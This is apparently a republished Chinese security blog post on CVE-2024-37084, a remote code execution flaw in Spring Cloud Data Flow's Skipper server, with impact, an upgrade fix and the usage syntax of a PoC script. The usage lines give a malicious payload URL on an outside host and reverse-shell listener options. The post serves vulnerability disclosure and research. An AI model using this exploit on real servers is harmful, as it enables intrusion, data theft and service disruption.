===================================
0x01 工具介绍
0x02 安装与使用
漏洞原理: 在受影响的Spring Cloud Data Flow版本中,Skipper服务器在处理文件上传时缺乏对路径的有效验证。攻击者可以利用这一缺陷,构造恶意的上传请求,将包含特定YAML文件的压缩包上传至服务器。由于服务器在处理这些YAML文件时,使用了不安全的反序列化机制,攻击者可以通过在YAML文件中嵌入恶意代码,导致服务器执行任意代码。
危害: 成功利用该漏洞的攻击者可以在受影响的服务器上执行任意代码,可能导致以下后果:
-
服务器被完全控制: 攻击者可获取服务器的最高权限,执行任意操作。
-
数据泄露: 攻击者可能访问或窃取服务器上的敏感数据。
-
服务中断: 攻击者可能破坏服务器的正常运行,导致服务不可用。
修复建议: 官方已在2.11.4版本中修复了该漏洞。建议用户尽快将Spring Cloud Data Flow升级至2.11.4或更高版本,以消除安全隐患。
本项目包括对 CVE-2024-37084 的环境配置、漏洞分析、演示利用和漏洞利用代码(PoC)。
使用方法:
python CVE-2024-37084-Poc.py
用法示例:
python CVE-2024-37084-Poc.py --target_url <目标网址> --version <版本号> --payload_url <恶意载荷网址> [--listen_ip <监听IP>] [--listen_port <监听端口>]
这是针对 CVE-2024-37084 的远程代码执行漏洞的 PoC。 可选参数:
-h, --help:显示帮助信息并退出
--target_url TARGET_URL:目标服务器的 URL(例如:http://目标_IP:端口/api/package/upload)
--version VERSION:包的版本号(例如:5.0.0)
--payload_url PAYLOAD_URL:恶意载荷的 URL(例如:https://too.lewd.se/yaml-payload.jar)
--listen_ip LISTEN_IP:监听反向 shell 的 IP 地址(默认值:0.0.0.0)
--listen_port LISTEN_PORT:监听反向 shell 的端口号(默认值:4444)
配置监听端口以捕获反向 shell:
0x03 下载链接
原文始发于微信公众号(网络安全者):Spring Cloud Data Flow高危漏洞(CVE-2024-37084)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论